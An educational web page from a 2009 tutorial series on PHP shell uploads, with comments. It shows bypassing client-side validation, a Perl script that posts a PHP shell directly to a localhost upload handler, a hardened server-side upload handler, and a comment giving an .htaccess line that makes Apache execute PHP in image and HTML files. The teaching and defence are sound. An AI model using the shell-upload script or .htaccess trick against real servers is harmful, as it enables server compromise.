Bilbao Digital

Asociación para la Cualificación y el Aprendizaje Permanente

PHP shell upload III

Video content: defense and attack. Client-side validation using JavaScript and ActionScript.

The form tag's action attribute is dynamic: it is received from the SWF file, depending on the file being uploaded. We will decompile the SWF for academic purposes. Disabling JavaScript blocks that information exchange; we then add the right action target by editing the HTML form.

Anyhow, an attacker doesn't need any HTML form to upload a file. It can be done, for example, using a Perl script.

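#!/usr/bin/perl
# Posts a file straight to the upload handler as multipart/form-data;
# no HTML form, JavaScript or SWF is involved.
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

my $ua  = LWP::UserAgent->new;
my $res = $ua->request(POST 'http://localhost/demo3/upload3.php',
    Content_Type => 'form-data',
    # field name => [ local file to read, filename sent to the server ]
    Content      => [ userfile => [ 'basic-shell.php', 'basic-shell.php' ] ]);
print $res->as_string();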

This is the bottom line on client-side validation.
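
Since the request can arrive without the form, the JavaScript or the SWF, every check has to be repeated on the server. The following is an added example, not code from the original post or from the demo's upload3.php: a PHP upload handler that validates the request itself. The field name userfile matches the Perl script; the storage path, size cap and allow-list are assumptions.

```php
<?php
// Added example, not the demo's upload3.php. Assumed: storage path, size cap, allow-list.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app-data/uploads';  // assumed; outside the web root
const MAX_BYTES  = 2 * 1024 * 1024;          // assumed size cap
const ALLOWED    = [                         // extension => expected MIME type
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
];

function reject(int $status, string $why): void
{
    http_response_code($status);
    exit($why . "\n");
}

// "userfile" is the field name the Perl script posts.
$f = $_FILES['userfile'] ?? null;
if (!is_array($f) || !is_int($f['error']) || $f['error'] !== UPLOAD_ERR_OK) {
    reject(400, 'upload failed');   // also rejects userfile[] array uploads
}
if ($f['size'] > MAX_BYTES || !is_uploaded_file($f['tmp_name'])) {
    reject(400, 'rejected');
}

// The client-supplied name is read only for its final extension.
$ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
if (!array_key_exists($ext, ALLOWED)) {
    reject(415, 'file type not allowed');
}

// Inspect the bytes; $f['type'] is whatever the client put in the request.
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
if ($mime !== ALLOWED[$ext]) {
    reject(415, 'content does not match extension');
}

// Server-generated name: the uploader never chooses the stored file name,
// so basic-shell.php or .htaccess cannot be written as such.
$dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($f['tmp_name'], $dest)) {
    reject(500, 'could not store file');
}
echo "stored\n";
```

A file with a valid image header can still contain PHP text, so the type check is only one layer. Storing the file outside the web root under a generated name is what keeps it from being executed.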

Comments (3)
...
written by willemkenn, 10 January 2009

nice video...have you tried inserting a php shell code in .HTML?

Votes: +0

...
written by Carlos Sánchez, 10 January 2009

A PHP file is interpreted by the PHP process following the Apache AddType directive:

# AddType application/x-httpd-php .php

The AddType directive defines MIME type and file extension pairs. For example, using PHP4, use the AddType directive to make the Web server recognize files with PHP file extensions (.php4, .php3, .phtml, .php) as PHP MIME types.

To allow the server to read PHP script inserted into another file extension you must edit the httpd.conf file or, on the hacker side, upload a .htaccess file to the same folder to override the Apache configuration:

AddType application/x-httpd-php .php .jpg .gif .htm .html

Remember to try this on localhost ;-).


Votes: +8

thanks
written by willemkenn, 29 January 2009

Thank you...

Votes: +0

